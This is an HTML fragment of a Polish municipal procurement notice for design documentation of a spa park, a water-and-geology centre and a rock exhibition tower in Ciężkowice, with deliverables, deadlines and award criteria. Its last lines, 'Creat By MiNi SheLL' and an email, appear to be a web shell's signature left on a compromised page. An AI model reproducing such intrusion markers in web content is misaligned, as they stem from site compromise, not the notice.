inwestycji celu publicznego po otrzymaniu ostatecznej decyzji środowiskowej oraz wniosek wraz z jego złożeniem i uzyskaniem decyzji (w przypadku takiej konieczności - dot. odcinka sieci kanalizacyjnej oraz parkingów) - 1 egz. dla Zamawiającego i egzemplarze do złożenia wniosku, - Przygotowanie i zawarcie umów użyczenia z oświadczeniami dla terenu na cele budowlane w wymaganym zakresie dla każdej działki - 2 egz. dla Zamawiającego i egz. niezbędne do uzgodnień, - Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej, - Projekt architektoniczno-budowlany (wraz z projektem zagospodarowania terenu i planem bezpieczeństwa i ochrony zdrowia) Budowy odcinka sieci kanalizacji sanitarnej i odcinka sieci wodociągowej dla Parku Zdrojowego i Międzynarodowego Centrum Edukacyjno-Turystycznego - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - Projekt wykonawczy Budowy odcinka sieci kanalizacji sanitarnej i odcinka sieci wodociągowej dla Parku Zdrojowego i Międzynarodowego Centrum Edukacyjno- - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - Projekt architektoniczno-budowlany (wraz z projektem zagospodarowania terenu i planem bezpieczeństwa i ochrony zdrowia) przebudowy drogi dojazdowej (z oświetleniem) do Parku Zdrojowego i Międzynarodowego Centrum Edukacyjno-Turystycznego wraz z budową odwodnienia układu drogowego oraz budową chodnika i miejsc postojowych - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń - Projekt wykonawczy przebudowy drogi dojazdowej do Parku Zdrojowego i Międzynarodowego Centrum Edukacyjno-Turystycznego wraz z budową odwodnienia tej drogi oraz budową chodnika i miejsc postojowych - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - Projekty wykonawcze (w przypadku konieczności) przebudowy (zabezpieczenia) urządzeń obcych (gaz, woda, kanalizacja sanitarna, teletechnika, energetyka, itp.) - 5 egz. dla Zamawiającego i egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - Projekt wycinki drzew (w przypadku konieczności) - 5 egz. dla Zamawiającego, - STWiOR - 3 egz., - Przedmiar robót - po 3 egz., - Kosztorys inwestorski - 3 egz., - Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju (gatunku) typu materiałów. - Dokumentacja w wersji elektronicznej (wszystkie opracowania w formie pdf - zeskanowane opracowania z uzgodnieniami) oraz w wersji edytowalnej: część opisowa (word,exel), rysunki w formacie dwg lub dxf) - 4 egz. (2 egz. w formacie pdf, 2 egz. w wersji edytowalnej). - Wniosek z materiałami do złożenia wniosku o wydanie pozwolenia wodnoprawnego wraz operatem wodnoprawnym (w przypadku takiej konieczności) - 1 egz. dla Zamawiającego wraz z wersją elektroniczną i 1 egz. do złożenia wniosku, - Wniosek z materiałami do złożenia wniosku o wydanie pozwolenia na wycinkę drzew (w przypadku takiej konieczności) - 1 egz. dla Zamawiającego i egzemplarze do złożenia wniosku, - Przygotowanie materiałów do złożenia wniosku o uzyskanie pozwolenia na budowę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.30.00.00-1, 71.32.00.00-7, 71.42.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Skrócenie terminu wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej dla budowy Parku Zdrojowego  wraz z ogólnodostępnymi łazienkami mineralnymi, arboretum, alpinarium, ogrodem sensorycznym i ogrodem wodnym, siecią alejek, siłownią terenową i placem zabaw i oświetleniem solarnym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łazienki mineralne zostaną wybudowane na dz. nr 992/11 (Ciężkowice) i składać się będą z następujących elementów: - częściowo zadaszona infrastruktura z wiatami, infrastruktura leczniczo-rehabilitacyjna (ogród wodny) wykorzystująca metodę Kneippa, - sieć alejek z małą architekturą (kosze, ławki, stojaki rowerowe), - ogród sensoryczny, - arboretum (ogród dendrologiczny), - alpinarium, - siłownia terenowa - edukacyjny plac zabaw, - parking - sieć oświetlenia z wykorzystaniem lamp na energię odnawialną. - mała architektura Ogólnodostępny ogród wodny ma składać się z systemu kaskad, umożliwiających odbywanie kąpieli leczniczych, brodzenia itp. (Katalog produktów - załącznik do opracowania pn. Założenia architektoniczne i metodologiczne Źródlanego szlaku wraz z określeniem poszczególnych elementów i funkcji obiektów na szlaku, wykorzystujących metodę Księdza Kneipp-a w podstawowym zakresie (stopy, kolana, dłonie, łokcie). Urządzenia będą wykonane z naturalnych materiałów (głównie kamień). Całość terenu oświetlona lampami solarnymi. Woda dla potrzeb terapii będzie miejscowo podgrzewana i pochodzić będzie z odwiertu wody mineralnej siarczkowo-solankowej, jak również z odwiertu wody pitnej sporządzonego na potrzeby powstałej infrastruktury. Powstała infrastruktura lecznicza ma być zgodna z Założeniami architektonicznymi i metodologicznymi Źródlanego szlaku wraz z określeniem poszczególnych elementów i funkcji obiektów na szlaku stanowiącymi załącznik nr 9 do SWIZ. W ramach projektu PARKU ZDROJOWEGO Wykonawca ma wykonać projekt systemów multimedialnych oraz dokonać doboru urządzeń zgodnie z Wytycznymi koncepcyjnymi dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Wybrane gminy i obszary - załącznik nr 11 do SIWZ oraz w zgodzie z brzmieniem art. 29 Ustawy Pzp. Przedmiot zamówienia w części II obejmuje: - Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej, - Projekt architektoniczno - budowlany składający się m in. z: - wizualizacji, - projektu nasadzeń, - projektu zagospodarowania terenu, - projekt techniczny (alejki, ścieżki, instalacje, altany, wiaty, urządzenia do wodolecznictwa, oświetlenie solarne) 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - Dokumentacja w wersji elektronicznej(wszystkie opracowania w formie pdf - zeskanowane opracowania z uzgodnieniami) oraz w wersji edytowalnej: część opisowa (word,exel), rysunki w formacie dwg lub dxf) - 4 egz. (2 egz. w formacie pdf, 2 egz. w wersji edytowalnej). - Opracowanie projektu robót geologicznych do zatwierdzenia go przez odpowiednią instytucję (Starostwo Powiatowe w Tarnowie) wraz z Operatem wodnoprawnym na wykonanie urządzenia wodnego - dla studni zaopatrującej w wodę łazienki mineralne - 1 egz. dla Zamawiającego wraz z wersją elektroniczną i 1 egz. do złożenia wniosku, - Opracowanie dokumentacji hydrogeologicznej ustalającej zasoby eksploatacyjne ujęcia oraz przekazanie dokumentacji celem zatwierdzenia do odpowiedniego organu administracji (Starostwo Powiatowe w Tarnowie) dla studni zaopatrującej w wodę łazienki mineralne - 1 egz. dla Zamawiającego wraz z wersją elektroniczną i 1 egz. do złożenia wniosku, - Projekt wykonawczy 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - STWiOR - po 3 egz. dla każdej branży, - Przedmiar robót - po 3 egz., - Kosztorys inwestorski - 3 egz., - Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju, gatunku, typu materiałów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.30.00.00-1, 71.32.00.00-7, 71.42.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Skrócenie terminu wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie kompleksowej dokumentacji projektowej dla budowy Domu Wody - Dom Wody - centrum balneologii i geologii..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja: działki nr: 639 i 640, 641/2 (budynek wraz z zagospodarowaniem przyległego terenu) oraz działki nr: 632, 635 (przewiązka) w m. Ciężkowice, Gmina Ciężkowice; Powierzchnia zabudowy ok. 800 m2, Powierzchnia użytkowa budynku ok. 1000 m2, Liczba kondygnacji: 2, Wysokość: do 12 m, Budynek wolnostojący, bez podpiwniczenia. Należy zaprojektować połączenie projektowanego budynku Domu Wody z istniejącym budynkiem Muzeum Przyrodniczego im. Krystyny i Włodzimierza Tomków, zlokalizowanym na dz. nr 635, przewiązką poprowadzoną ponad oddzielającą oba obiekty drogą gminną - ul. Parkową (dz. nr 632) przy wykorzystaniu istniejącego wejścia do budynku muzeum od strony dz. nr 639, 640. Uwaga! Zamawiający jest w posiadaniu dokumentacji projektowej istniejącego budynku Muzeum Przyrodniczego im. K. i W. Tomków. Dokumentacja ta zostanie udostępniona Wykonawcy do wykorzystania przy prowadzeniu prac projektowych jako inwentaryzacja stanu istniejącego. Projekt Domu Wody powinien uwzględniać co najmniej nw. pomieszczenia: - Pawilon edukacyjny (Foyer) - Sala konferencyjno-edukacyjna - Zaplecze biurowe, techniczne i socjalne - Recepcja - Zaplecze techniczne sceny i garderoba oraz taras zewnętrzny. Schemat połączeń funkcjonalnych pomieszczeń Dom Wody - centrum balneologii i geologii stanowi załącznik nr 10 do SIWZ. Wszystkie zaprojektowane pomieszczenia powinny posiadać właściwie dobrane poszczególne parametry techniczne, w tym wymiary, standardy instalacji elektrycznej, wentylacji, itp. umożliwiające montaż i poprawne funkcjonowanie systemów multimedialnych projektowanej ekspozycji multimedialnej Domu Wody. W zakres projektu wchodzi również kompletna dokumentacja branżowa, dotycząca instalacji zewnętrznych i przyłączy, przy czym obiekt będzie wyposażony w następujące instalacje wewnętrzne: elektryczną, wodociągową, kanalizacyjną, gazową, c.o., klimatyzację oraz systemy sterowania budynku i systemy zabezpieczające. Częścią dokumentacji będzie również zagospodarowanie terenu przyległego (otoczenie budynku) elementami małej architektury, w tym fontanna, wiaty drewniane itp. wraz z elementami edukacyjnymi parku i urządzeniami wodnymi, a także ogrodzeniem zaprojektowanymi zgodnie z Założeniami architektonicznymi i metodologicznymi Źródlanego szlaku wraz z określeniem poszczególnych elementów i funkcji obiektów na szlaku stanowiącymi załącznik nr 9 do SWIZ. W ramach projektu Domu Wody Wykonawca ma wykonać projekt systemów multimedialnych oraz dokonać doboru urządzeń zgodnie z Wytycznymi koncepcyjnymi dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Dom Wody - centrum balneologii i geologii - załącznik nr 12 do SIWZ oraz w zgodzie z brzmieniem art. 29 Ustawy Pzp. Dla potrzeb Domu Wody zostanie wykorzystana istniejąca powierzchnia postojowa w sąsiedztwie inwestycji. Dla powyższego zadania konieczne jest pozyskanie następujących dokumentów: - Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej, - Projekt architektoniczno-budowlany(wraz z projektem zagospodarowania terenu, planem bezpieczeństwa i ochrony zdrowia i charakterystyką energetyczną obiektu zgodnie z przepisami obowiązującymi na dzień oddania projektu) - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń - Projekt wykonawczy 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - STWiOR - po 3 egz. dla każdej branży, - Przedmiary robót (dla każdej branży oddzielnie) - po 3 egz. dla każdej branży, - Kosztorysy inwestorskie wraz ze zbiorczym zestawieniem kosztów - 3 egz., - Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju (gatunku) typu materiałów. - Projekt aranżacji wnętrza i scenariusz ekspozycji wraz doborem systemów i urządzeń multimedialnych ze schematami technicznymi - 3 egz. - Przedmiary robót dla wykonania ekspozycji i wyposażenia budynku- 3 egz., - Kosztorys inwestorski wykonania ekspozycji i wyposażenia budynku - 3 egz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.30.00.00-1, 71.32.00.00-7, 71.42.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Skrócenie terminu realizacji zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie kompleksowej dokumentacji projektowej dla budowy Skalnej Baszty Skalna Baszta - geologiczna ekspozycja edukacyjna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja; działka nr 1038/1 w m. Ciężkowice, gm. Ciężkowice Powierzchnia zabudowy: ok. 80 m2, Powierzchnia użytkowa: ok. 120 m2, Wysokość do 18m. Obiekt wolnostojący, bez podpiwniczenia, przekryty tarasem widokowym, założony na rzucie zbliżonym do owalu. Skalna baszta będzie eksponować możliwie kompletny zbiór minerałów i skał w ujęciu petrograficznym (skały magmowe, osadowe i metamorficzne). Nacisk położony zostanie na fizjografię skał - ukazanie różnorodności, podstawowe cechy fizyko-chemiczne i ewentualnie geografię pokładów (tylko rozkład na terenie Polski i Małopolski). Najważniejsza część ekspozycji będzie dotyczyć źródeł mineralnych (charakterystyka, różnice w składzie i co z nich wynika etc.). Skalna baszta ma za zadanie ukazywać bogactwo geologiczne (nie objaśnia procesów - te znajdą ilustrację w Domu wody). Baszta będzie budowlą murowaną, w której ściany (również wzdłuż schodów) wbudowane zostaną elementy ekspozycji. Budowla zwieńczona tarasem pełniącym funkcje widokowe. Przedmiot zamówienia w części IV obejmuje: - Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej, - Projekt architektoniczno-budowlany(wraz z projektem zagospodarowania terenu i planem bezpieczeństwa i ochrony zdrowia) - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń - Projekt wykonawczy 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, - STWiOR - po 3 egz. dla każdej branży, - Przedmiary robót (dla każdej branży oddzielnie) - po 3 egz. dla każdej branży, - Kosztorys inwestorski (roboty budowlane) - 3 egz., - Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju, gatunku, typu materiałów. - Scenariusz ekspozycji wraz doborem systemów i urządzeń multimedialnych ze schematami technicznymi- 3 egz. - Kosztorys inwestorski (wykonania i dostawy ekspozycji oraz wyposażenia budynku) - 3 egz. W ramach projektu SKALNEJ BASZTY Wykonawca ma wykonać projekt systemów multimedialnych oraz dokonać doboru urządzeń zgodnie z Wytycznymi koncepcyjnymi dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Wybrane gminy i obszary - załącznik nr 11 do SIWZ oraz w zgodzie z brzmieniem art. 29 Ustawy Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-6, 71.30.00.00-1, 71.32.00.00-7, 71.42.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Skrócenie terminu wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com